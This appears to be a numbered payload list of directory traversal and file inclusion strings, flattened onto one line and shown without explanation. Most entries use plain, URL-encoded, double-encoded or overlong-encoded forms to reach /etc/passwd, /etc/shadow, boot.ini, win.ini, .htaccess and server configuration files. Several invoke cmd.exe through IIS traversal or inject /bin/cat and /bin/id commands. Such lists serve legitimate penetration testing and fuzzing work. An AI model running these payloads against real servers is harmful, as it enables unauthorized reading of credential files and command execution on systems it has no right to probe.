\..\..\..\..\..\WINDOWS\win.ini 6 | \..\..\..\..\..\..\WINDOWS\win.ini 7 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 8 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 9 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 10 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 11 | %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 12 | %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 13 | %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 14 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 15 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 16 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 17 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 18 | ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 19 | ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 20 | ..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 21 | ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 22 | ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 23 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 24 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 25 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 26 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 27 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 28 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 29 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 30 | %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 31 | %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 32 | ../../../../../../../../../etc/passwd 33 | ../../../../../../../../etc/passwd 34 | ../../../../../../../etc/passwd 35 | ../../../../../../etc/passwd 36 | ../../../../../etc/passwd 37 | ../../../../etc/passwd 38 | ../../../etc/passwd 39 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 40 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 41 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 42 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 43 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 44 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 45 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 46 | %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 47 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 48 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 49 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 50 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 51 | ../../../.htaccess 52 | ../../.htaccess 53 | ../.htaccess 54 | .htaccess 55 | ././.htaccess 56 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 57 | %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 58 | %2e%2e%2f%2e%68%74%61%63%63%65%73%73 59 | %2e%68%74%61%63%63%65%73%73 60 | %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 61 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 62 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 63 | %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 64 | %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 65 | %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 66 | ../../../../../../../../../../../../etc/hosts%00 67 | ../../../../../../../../../../../../etc/hosts 68 | ../../boot.ini 69 | /../../../../../../../../%2A 70 | ../../../../../../../../../../../../etc/passwd%00 71 | ../../../../../../../../../../../../etc/passwd 72 | ../../../../../../../../../../../../etc/shadow%00 73 | ../../../../../../../../../../../../etc/shadow 74 | /../../../../../../../../../../etc/passwd^^ 75 | /../../../../../../../../../../etc/shadow^^ 76 | /../../../../../../../../../../etc/passwd 77 | /../../../../../../../../../../etc/shadow 78 | /./././././././././././etc/passwd 79 | /./././././././././././etc/shadow 80 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 81 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 82 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 83 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 84 | /..\../..\../..\../..\../..\../..\../etc/passwd 85 | /..\../..\../..\../..\../..\../..\../etc/shadow 86 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 87 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 88 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 89 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 90 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 91 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 92 | %0a/bin/cat%20/etc/passwd 93 | %0a/bin/cat%20/etc/shadow 94 | %00/etc/passwd%00 95 | %00/etc/shadow%00 96 | %00../../../../../../etc/passwd 97 | %00../../../../../../etc/shadow 98 | /../../../../../../../../../../../etc/passwd%00.jpg 99 | /../../../../../../../../../../../etc/passwd%00.html 100 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 101 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 102 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 103 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 104 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 105 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 106 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 107 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 108 | \\'/bin/cat%20/etc/passwd\\' 109 | \\'/bin/cat%20/etc/shadow\\' 110 | ../../../../../../../../conf/server.xml 111 | /../../../../../../../../bin/id| 112 | C:/inetpub/wwwroot/global.asa 113 | C:\inetpub\wwwroot\global.asa 114 | C:/boot.ini 115 | C:\boot.ini 116 | ../../../../../../../../../../../../localstart.asp%00 117 | ../../../../../../../../../../../../localstart.asp 118 | ../../../../../../../../../../../../boot.ini%00 119 | ../../../../../../../../../../../../boot.ini 120 | /./././././././././././boot.ini 121 | /../../../../../../../../../../../boot.ini%00 122 | /../../../../../../../../../../../boot.ini 123 | /..\../..\../..\../..\../..\../..\../boot.ini 124 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 125 | \..\..\..\..\..\..\..\..\..\..\boot.ini 126 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 127 | ..\..\..\..\..\..\..\..\..\..\boot.ini 128 | /../../../../../../../../../../../boot.ini%00.html 129 | /../../../../../../../../../../../boot.ini%00.jpg 130 | /.../.../.../.../.../ 131 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 132 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini --------------------------------------------------------------------------------